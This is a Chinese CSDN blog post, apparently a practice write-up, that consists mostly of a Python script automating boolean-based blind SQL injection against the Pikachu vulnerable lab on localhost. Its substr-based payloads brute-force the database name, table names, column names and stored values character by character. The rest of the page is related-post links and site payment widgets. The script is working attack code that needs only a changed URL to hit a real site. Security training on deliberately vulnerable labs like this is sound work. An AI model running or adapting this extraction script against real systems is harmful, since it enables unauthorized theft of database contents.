pikachu靶场(SQL注入基于布尔的盲注)python实现

已于 2024-05-20 22:48:12 修改
阅读量412 收藏
点赞数 4
分类专栏: pikachu靶场 python基础学习 文章标签: sql python 数据库
于 2024-05-20 22:46:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74342020/article/details/139076997
版权 
import requests
from bs4 import BeautifulSoup

url = "http://localhost:8086/pikachu-master/vul/sqli/sqli_blind_b.php"


def get_database_name(url):
    dataname = ''  # 初始化一个空字符串用于存储数据库名
    dict = 'abcdefghijklmnopqrstuvwxyz '  # 数据库名可能存在这些字段中的任意一个
    i = 1
    while True:
        for j in dict:  # 遍历dict中的字符
            payload = {
                'name': "admin' and substr(database(),%d,1) ='%s'-- " % (i, j),
                # 这里的substr函数用于截取数据库名的第i个字符,并与dict中的字符进行比较
                'submit': "%E6%9F%A5%E8%AF%A2"
            }
            response = requests.request("get", url, params=payload)  # 发送请求
            soup = BeautifulSoup(response.text, 'html.parser')  # 解析响应内容
            token = soup.find_all('p', class_="notice")[0].text  # 找到页面中的提示信息
            if 'uid' in token:  # 如果提示信息中包含uid,说明数据库名可能存在该字符
                if j != ' ':  # 如果该字符为z,说明数据库名可能存在该字符
                    dataname += j  # 将该字符添加到数据库名中
                    i += 1
                else:  # 如果该字符为 ',说明数据库名可能存在该字符,但由于该字符在数据库名中是最后一个,所以不再添加
                    return dataname


database_name = get_database_name(url)
print("数据库名为:" + database_name)


def get_table_name(url, database_name):
    table_name = ""  # 初始化一个空字符串用于存储表名
    dict = 'abcdefghijklmnopqrstuvwxyz, '  # 表名可能存在这些字段中的任意一个
    i = 1
    while True:
        for j in dict:
            payload = {
                'name': "admin' and substr((select group_concat(table_name) from information_schema.tables where table_schema='%s'),%d,1) ='%s'-- " % (
                    database_name, i, j),
                # 这里的substr函数用于截取数据库名的第i个字符,并与dict中的字符进行比较
                'submit': "%E6%9F%A5%E8%AF%A2"
            }
            response = requests.request("get", url, params=payload)  # 发送请求
            soup = BeautifulSoup(response.text, 'html.parser')  # 解析响应内容
            token = soup.find_all('p', class_="notice")[0].text  # 找到页面中的提示信息
            if 'uid' in token:  # 如果提示信息中包含uid,说明表名可能存在该字符
                if j != ' ':
                    table_name += j
                    i += 1
                else:
                    return table_name  # 找到表名后返回


database_name = input("请输入您要查询的数据库名:")
table_name = get_table_name(url, database_name)
print("表名为:" + table_name)


def get_column_name(url, database_name, table_name):
    column_name = ''  # 初始化一个空字符串用于存储列名
    dict = 'abcdefghijklmnopqrstuvwxyz, '  # 列名可能存在这些字段中的任意一个
    i = 1
    while True:
        for j in dict:  # 遍历dict中的字符
            payload = {
                'name': "admin' and substr((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'),%d,1) ='%s'-- " % (
                    database_name, table_name, i, j),
                # 这里的substr函数用于截取数据库名的第i个字符,并与dict中的字符进行比较
                'submit': "%E6%9F%A5%E8%AF%A2"
            }
            response = requests.request("get", url, params=payload)  # 发送请求
            soup = BeautifulSoup(response.text, 'html.parser')  # 解析响应内容
            token = soup.find_all('p', class_="notice")[0].text  # 找到页面中的提示信息
            if 'uid' in token:  # 如果提示信息中包含uid,说明列名可能存在该字符
                if j != ' ':  
                    column_name += j  # 将该字符添加到列名中
                    i += 1
                else:   
                    return column_name  # 找到列名后返回


table_name = input('请输入您要查询的表名:')
column_name = get_column_name(url, database_name, table_name)
print("列名为:" + column_name)

def get_value(url,table_name,column_name1,column_name2):
    value= ''
    dict = 'abcdefghijklmnopqrstuvwxyz1234567890, '
    i = 1
    while True:
        for j in dict:  # 遍历dict中的字符
            payload = {
                'name': "admin' and substr((select group_concat(concat(%s,',',%s)) from %s),%d,1) ='%s'-- " % (
                    column_name1, column_name2 , table_name,i,j),
                # 这里的substr函数用于截取数据库名的第i个字符,并与dict中的字符进行比较
                'submit': "%E6%9F%A5%E8%AF%A2"
            }
            response = requests.request("get", url, params=payload)  # 发送请求
            soup = BeautifulSoup(response.text, 'html.parser')  # 解析响应内容
            token = soup.find_all('p', class_="notice")[0].text  # 找到页面中的提示信息
            if 'uid' in token:
                if j != ' ':
                    value += j
                    i += 1
                else:
                    return value

input_value = input('请输入您要查询的列名1:')
input_value2 = input('请输入您要查询的列名2:')
value = get_value(url, table_name, input_value, input_value2)
print("查询结果为:" + value)

执行结果

月敛苏时意
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu靶场SQL注入.docx
09-13
pikachu靶场SQL注入章节解题
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 2217
Pikachu-----Sql Inject(SQL注入
pikachu 靶场通关(全)
Innocence_0的博客
04-12 1365
1.1.1 漏洞利用burp抓包,ctrl+i 添加爆破根据返回长度得到两个用户。
SQL注入04】布尔盲注实例手操
Fighting_hawk的博客
02-19 3015
1. 理解布尔注入的判断原理; 2. 掌握布尔盲注的方法。
pikachu靶场 暴力破解 sql注入详解
winofkill的博客
12-17 1995
pikachu靶场暴力破解,sql注入详解
[Pikachu靶场实战系列] SQL注入盲注
00勇士王子的博客
07-29 2947
目录盲注布尔盲注时间盲注 盲注 盲注的意思就是说页面没有明显的回显,我们只能通过其他方式判断注入点。 常见的方式有两种,一种是布尔盲注,通过页面返回的不同状态判断语句是否被执行。另一种是时间盲注,通过页面加载时间来判断语句是否被执行。 布尔盲注 先输入一个之前关卡中的名字,返回正常 加上单引号,并没有报错,而是返回了我输入的信息不存在 加上注释符号后,返回又正常了,说明注入点存在,且就是单引号闭合 判断数据库名的长度 lucy’and length(database())>=1 # l
python实现sql宽字节注入+布尔盲注
箭雨镜屋
05-01 499
一、注意点 本文代码是对着pikachu漏洞靶场的宽字节注入关卡开发的,代码中的payload和参数都基于此,使用本文代码需要修改payload和部分参数,具体见代码注释 比起单纯的布尔盲注 二、代码 三、使用 四、测试 ...
Python自动化sql注入布尔盲注_布尔盲注脚本,Python客户端开发面试题目
2401_84182636的博客
04-10 619
演示靶场sqli-labs。
pikachu靶场sql注入)(宽字节注入和盲注
weixin_54431413的博客
03-17 3747
一、宽字节注入 1.宽字节注入原理 宽字节注入有addslashes,mysql_real_escape_string,mysql_escape_string等转义的函数,对输入'进行了转义\' 在这个靶场是addslashes(),这个函数对这些进行了转义 单引号(') 双引号(") 反斜杠(\) NULL 但是在下方设置编码时设置为了gbk编码, 利用反斜杠编码为%5c,这里用%df构成(連)字绕过对 ' 的转义 2.首先利用burp抓包 然后用 1%df' union selec
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
基于pikachu靶场总结
02-24
个人对pikachu靶场总结
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
基础—SQL—DQL(数据查询语言)聚合函数
m0_74363339的博客
05-30 491
这篇博客主要讲到了SQL分类中的DQL(数据查询语言)—聚合函数的讲解,聚合函数比较简单,但它主要配合着分组查询进行数据查询的操作,注意NULL的字段值不参与聚合函数的运算......
postgressql——Tuple学习(2)
Re_view的博客
05-27 355
postgressql——Tuple学习(2)
PostgreSQL发展史
PGCCC的博客
05-28 1025
PostgreSQL 的发展史反映了其从学术研究项目到全球领先的开源数据库系统的演变过程。通过不断的创新和社区支持,PostgreSQL 已经成为一个功能强大、性能优越的数据库管理系统,广泛应用于各个行业的关键业务场景中。#postgresql培训。
Spark SQL数据源 - JSON数据集
最新发布
IT深耕十余载,大道之简
06-01 530
方法可以处理包含多个JSON对象的文件(每个对象一行),也可以处理包含单个JSON对象的文件。如果你在一个集群环境中运行Spark,你需要将这部分配置更改为适合你的集群环境的设置。的JSON文件,并且它位于Spark可以访问的位置(可以是本地文件系统、HDFS、S3等)。此外,如果你的JSON数据存储在HDFS、S3或其他Hadoop支持的文件系统上,你可以使用相应的文件路径(如。最后,你可以使用sbt或Maven等工具来构建和运行这个项目,或者如果你已经设置好了Spark环境,你可以使用。
sql server2022安装教程
没有黑科技
05-29 870
1. 引言 - 1.1 版本介绍 - 1.2 本教程目标 2. 系统要求 - 2.1 操作系统要求 - 2.2 硬件要求 - 2.3 软件要求 3. 下载SQL Server 2022 - 3.1 访问官方下载页面 - 3.2 选择版本 - 3.3 下载步骤 4. 安装前的准备 - 4.1 检查更新 - 4.2 备份现有数据 - 4.3 确保足够的权限 5. 开始安装 - 5.1 启动安装程序 - 5.2 选择安装类型 -
pikachu靶场sql注入
07-27
Pikachu靶场中,有多种类型的SQL注入漏洞可以进行测试和学习。这些类型包括数字型注入、字符型注入、搜索型注入、xx型注入、insert/update注入、delete注入、http头注入、盲注(基于布尔值)和盲注(基于时间)以及宽字节注入等。你可以使用工具如sqlmap来进行注入测试,通过构造恶意的SQL语句来获取数据库中的信息。例如,使用sqlmap命令可以指定目标URL和参数,然后进行注入测试,获取数据库中的表信息。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [Pikachu漏洞靶场系列之SQL注入](https://blog.csdn.net/weixin_45868644/article/details/120237977)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [pikachu靶场通关之sql注入系列](https://blog.csdn.net/qq_51902218/article/details/120333234)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Pikachu(皮卡丘)靶场SQL注入](https://blog.csdn.net/weixin_44268918/article/details/128317939)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值